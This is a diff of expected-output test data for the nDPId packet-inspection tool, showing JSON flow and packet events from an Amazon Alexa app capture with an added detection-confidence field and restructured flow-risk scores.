 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1490976027733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976027733,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c0BAAEAGOiysECrYrNkJjorUAFAegTplAAAAAKAC\/\/+MiQAAAgQFtAQCCAoA9kklAAAAAAEDAwg="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1490976027741,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1490976027741,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1490976027776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976027776,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8g+MAADQGdYms2QmOrBAq2ABQitTVYWKuHoE6ZqASpahLiwAAAgQFZAQCCApVvw3GAPZJJQEDAwc="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1490976027777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976027777,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c0FAAEAGOjOsECrYrNkJjorUAFAegTpm1WFir4AQAVceVQAAAQEICgD2SSlVvw3G"}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}}
 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1490976027958,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1490976027958,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQaiwAAEABYsesECoBrBAq2AUBiVKsECoqRQAANNZ6QAA\/BgDirBAq2K3C37ynfhRsXkGjCY7hdlaAEAFbkZsAAAEBCAoA9kk7K\/xGxA=="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1490976029184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976029184,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk5AAEARM2msECrYrBAqAbwbADUAKEUyqIoBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1490976029244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1490976029244,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90PZAAEARvD+sECoBrBAq2AA1vBsAqWPAqIqBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAToAAoDd3d3A2NkbsAQwCwABQABAAAABgAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAQABDRV0cXAQgABAAEAAAAEAAQ0VdGPwEIAAQABAAAABAAENFXR2MBCAAEAAQAAAAQABDRV0Xo="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029248,"flow_last_seen":1490976029248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976029248,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1490976029248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976029248,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xDtAAEAGmX2sECrYNFXRxdfKAbvTso2HAAAAAKAC\/\/\/liQAAAgQFtAQCCAoA9km8AAAAAAEDAwg="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1490976029325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976029325,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqrg0VdHFrBAq2AG718qLhBMS07KNiKAScSCB1QAAAgQFtAQCCAptCebiAPZJvAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1490976029328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976029328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xDxAAEAGmYSsECrYNFXRxdfKAbvTso2Ii4QTE4AQAVcgZAAAAQEICgD2ScRtCebi"}
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01493{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1490976029669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1490976029669,"pkt":"AMDKkaPvePiC0\/vCCABFAABGWk9AAEARM16sECrYrBAqAU3\/ADUAMlRV5qsBAAABAAAAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1490976029753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1490976029753,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw0QhAAEARvHqsECoBrBAq2AA1Tf8AXGjL5quBgAABAAIAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQABwAwABQABAAACoQAOBG1hZHMGYW1hem9uwCHANgABAAEAAAAGAAQ0XugA"}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029756,"flow_last_seen":1490976029756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976029756,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1490976029756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976029756,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YepAAEAG5YqsECrYNF7oAIMUAbsV\/ygFAAAAAKAC\/\/9G\/wAAAgQFtAQCCAoA9knvAAAAAAEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1490976029858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976029858,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9PhAAOcGq4c0XugArBAq2AG7gxTPTpIKFf8oBnASH\/5MlgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1490976029859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976029859,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYetAAEAG5Z2sECrYNF7oAIMUAbsV\/ygGz06SC1AQAVeXBwAA"}
